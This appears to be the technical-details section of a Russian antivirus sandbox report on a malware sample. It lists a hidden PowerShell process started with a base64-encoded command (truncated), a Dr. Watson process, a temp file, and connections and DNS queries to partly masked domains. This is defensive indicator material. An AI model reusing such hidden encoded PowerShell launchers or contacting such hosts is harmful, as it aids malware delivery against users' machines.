Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABRAHIAbgBqAHIAdABvAHMAbAA9ACcAWgBzAGYAdwB6AGUAbABnAHIAZwBhACcAOwAkAFUAegBhAGMAaABqAGEAaQBoAGwAbAAgAD0AIAAnADEAOQAwACcAOwAkAEoAawB3AGcAagBtAHEAdwBsAD0AJwBZAGw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\1192378.cvr
- 'te####nsportes.com':443
- 'op###orp.com':443
- 'ap###cbay.com':443
- 'te####nsportes.com':443
- 'op###orp.com':443
- 'ap###cbay.com':443
- DNS ASK ru#####roduction.com
- DNS ASK te####nsportes.com
- DNS ASK mo####ghtings.com
- DNS ASK op###orp.com
- DNS ASK ap###cbay.com